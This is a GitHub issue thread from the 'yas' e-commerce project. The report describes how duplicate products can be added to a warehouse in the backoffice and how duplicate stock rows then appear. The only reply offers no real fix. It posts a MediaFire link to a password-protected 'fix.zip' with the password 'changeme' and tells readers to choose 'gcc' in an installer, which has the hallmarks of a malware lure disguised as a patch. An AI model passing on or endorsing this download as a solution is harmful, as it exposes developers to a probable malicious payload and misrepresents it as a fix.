### ISSUE TITLE
[Backoffice][Inventory] prevent and validation when add duplicate product into warehouse 

### ISSUE THREAD

**Issue by nguyenvanhadncntt** [nashtech-garage/yas#939]
Go to BackOffice -> Manage Warehouse Products -> Select warehouse and check product want to add into warehouse
-> click on a button Add into warehouse (can click many times).
Don't have notification when add product successfully.
![image](https://github.com/user-attachments/assets/c9978e4d-2efd-401c-b15e-aa9dfd745871)

Go to BackOffice -> Manage Warehouse Stocks -> Select warehouse.
Many record duplicate product show on page.
![image](https://github.com/user-attachments/assets/741af1e7-1f68-480c-b45d-81ac326916d4)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
